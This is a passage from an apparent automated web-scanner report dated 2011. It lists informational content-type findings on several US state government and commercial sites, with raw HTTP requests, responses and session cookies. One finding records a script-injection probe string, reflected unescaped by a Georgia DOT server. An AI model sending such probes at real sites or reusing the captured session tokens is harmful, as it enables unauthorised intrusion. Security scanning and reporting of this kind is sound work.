Confidence:   Firm
Host:   https://www.vitalchek.com
Path:   /AjaxOrderStepServer.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /AjaxOrderStepServer.aspx HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
Origin: https://www.vitalchek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.1.10.1304125733
Content-Length: 30

data=shoppingCart&tryAttempt=0

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:23 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5814

{"OrderReviewed":false,"TermsAndConditionsAgreed":false,"CanChargeOnline":false,"currentOrderDetailIndex":0,"orderDetails":[{"ProductId":0,"ApplicantRelationship":null,"OrderDetailId":0,"CertificateFe
...[SNIP]...

30.278. https://www.vitalchek.com/VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vitalchek.com
Path:   /VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733

Response

HTTP/1.1 200 OK
Content-Length: 1614
Content-Type: image/gif
Content-Location: http://www.vitalchek.com/VitalChekStaticContent/images/Portal/VitalChek/background/orderPageRtPanelBlank.gif
Last-Modified: Mon, 04 Oct 2010 20:34:26 GMT
Accept-Ranges: bytes
ETag: "0b53789364cb1:c6a"
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:09:49 GMT

.PNG
.
...IHDR...7.........#1......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....tEXtSoftware.Paint.NET v3.20Y.vQ....IDATx^.\[..U...W.......V.E.._@E......xC@$.#>../fY...
...[SNIP]...

30.279. https://www.vitalchek.com/js/google_analytics_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vitalchek.com
Path:   /js/google_analytics_js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/google_analytics_js.aspx HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.1.10.1304125733

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:17 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22769


var _gat=new Object({c:"length",lb:"4.3",m:"cookie",b:undefined,cb:function(d,a){this.zb=d;this.Nb=a},r:"__utma=",W:"__utmb=",ma:"__utmc=",Ta:"__utmk=",na:"__utmv=",oa:"__utmx=",Sa:"GASO=",X
...[SNIP]...

30.280. https://www.vitalchek.com/order_step_js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vitalchek.com
Path:   /order_step_js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /order_step_js.aspx?timestamp=1304125790304&_=1304125790305 HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; __utmz=44146339.1304125733.1.1.utmcsr=dhh.louisiana.gov|utmccn=(referral)|utmcmd=referral|utmcct=/offices/page.asp; __utma=44146339.3347233763592010000.1304125733.1304125733.1304125733.1; __utmc=44146339; __utmb=44146339.2.10.1304125733

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:09:35 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html
Content-Length: 2862

showNameLabel();

jQuery(document).ready(function ($) {
LoadSurveyScript();
});

function showNameLabel()
{
if ($('YesRadio').checked == true) {
if (shoppingCart.currentOrderD
...[SNIP]...

30.281. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webtools.ca.gov
Path:   /javascript/shared/weather2/weather3.js.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/shared/weather2/weather3.js.asp HTTP/1.1
Host: www.webtools.ca.gov
Proxy-Connection: keep-alive
Referer: http://ca.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1450
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDBDARD=FEDLIDLBJBOJNPACINDMDKJL; path=/
Cache-control: private


document.write('    <div id="weather_container">');
document.write('        <img src="/images/common/weather/partly_cloudy.png" alt="Partly Cloudy" title="Partly Cloudy" class="weather_icon" />');
docu
...[SNIP]...

31. Content type is not specified  previous
There are 8 instances of this issue:


31.1. http://newchat.livehelper.com/servlet/lhChat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newchat.livehelper.com
Path:   /servlet/lhChat

Request

GET /servlet/lhChat HTTP/1.1
Host: newchat.livehelper.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: searsTest=TEST; st1099892=135396595z2011-04-30 06:12:09z;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 12:23:34 GMT
Connection: close
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Content-Length: 37

The specified action does not exist

31.2. http://sc.gov/Pages/images/ajax-loader.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc.gov
Path:   /Pages/images/ajax-loader.gif

Request

GET /Pages/images/ajax-loader.gif HTTP/1.1
Host: sc.gov
Proxy-Connection: keep-alive
Referer: http://sc.gov/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAgencySite=855793418.20480.0000; __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.1.10.1304123778

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 30 Apr 2011 00:36:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
Exires: Fri, 15 Apr 2011 00:36:28 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

31.3. http://sc.gov/_catalogs/masterpage/custom_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc.gov
Path:   /_catalogs/masterpage/custom_functions.js

Request

GET /_catalogs/masterpage/custom_functions.js HTTP/1.1
Host: sc.gov
Proxy-Connection: keep-alive
Referer: http://sc.gov/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAgencySite=855793418.20480.0000

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 30 Apr 2011 00:36:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
Exires: Fri, 15 Apr 2011 00:36:07 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

31.4. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//de.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5637922666&scriptVersion=1.1&d=1304123925477&&amp;SESSIONVAR!skill=Portal_Topics&amp;PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3209989796884927126; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123898833

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Set-Cookie: LivePersonID=-16601209214853-1304123902:-1:-1:-1:-1; expires=Sun, 29-Apr-2012 00:38:23 GMT; path=/hc/33511087; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

31.5. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:10 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)</script></h1><body>
/ContractsAdministration/index.cfm'"--><
...[SNIP]...

31.6. http://tomcat2.dot.state.ga.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:00 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /favicon.ico</h1><body>
/favicon.ico</body>

31.7. https://www.accesskansas.org/uccsearch/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /uccsearch/index.html

Request

GET /uccsearch/index.html HTTP/1.1
Host: www.accesskansas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000;

Response

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm=""
Server: BigIP
Connection: close
Content-Length: 2805


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
       <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       
       <title>
...[SNIP]...

31.8. http://www.osc.state.ny.us/redirect_social.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osc.state.ny.us
Path:   /redirect_social.php

Request

GET /redirect_social.php HTTP/1.1
Host: www.osc.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=47279033.1304117452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47279033.1256234497.1304117452.1304117452.1304117452.1; __utmc=47279033; __utmb=47279033.1.10.1304117452;

Response

HTTP/1.1 500 Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:40:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 174

PHP Notice: Undefined index: url in F:\Inetpub\wwwroot\redirect_social.php on line 15
PHP Notice: Undefined index: url in F:\Inetpub\wwwroot\redirect_social.php on line 15

Report generated by XSS.CX at Sat Apr 30 17:35:25 CDT 2011.